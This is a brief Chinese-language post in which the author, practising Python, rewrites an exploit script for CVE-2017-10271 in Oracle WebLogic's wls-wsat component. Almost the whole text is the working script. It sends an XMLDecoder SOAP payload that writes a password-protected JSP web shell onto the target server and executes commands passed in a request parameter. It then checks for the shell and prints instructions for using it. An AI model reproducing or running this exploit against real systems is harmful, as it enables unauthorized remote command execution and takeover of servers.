好久没有写python,然后准备要用python来做课设,现在就想认真学习python。正好在Tools看到大神发的exp,就想用Python练习一波。
# coding = utf-8
import requests
import sys
def exp(url):
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Cookie': 'JSESSIONID=nczyhG8NwQ8ypTPHBCBlDwBk26XQD2vSpC4m9hqTvn4Jgy0nrCMJ!1975769378',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
'Content-Type': 'text/xml',
'Content-Length': '2579'}
payload = '''<soapenv:Envelope xmlns:soapenv="https://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header><work:WorkContext xmlns:work="https://bea.com/2004/06/soap/workarea/">
<java>
<java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.jsp</string>
<void method="println"><string><%     if("passw@rd".equals(request.getParameter("pwd")))     {         java.io.InputStream in=Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();         int a = -1;         byte[] b = new byte[2048];         out.print("<pre>");         while((a=in.read(b))!=-1)         {             out.println(new String(b));         }         out.print("</pre>");     } %></string></void><void method="close"/>
</object>
</java>
</java>
</work:WorkContext>
</soapenv:Header><soapenv:Body/></soapenv:Envelope>'''
r = requests.post(url=url+"/wls-wsat/CoordinatorPortType",data=payload,headers=header)
rr = requests.get(url=url+"/wls-wsat/test.jsp")
if rr.status_code == 200:
print "CVE-2017-10271 is Valuble"
print "shell:%s/wls-wsat/test.jsp"%url
print "Post:pwd=passw@rd&i=Command"
else:
print "Getshell failure!"
if __name__ == '__main__':
try:
url = sys.argv[1]
except:
print "Usage: wls_Getshell.py https://test/"
exit()
exp(url)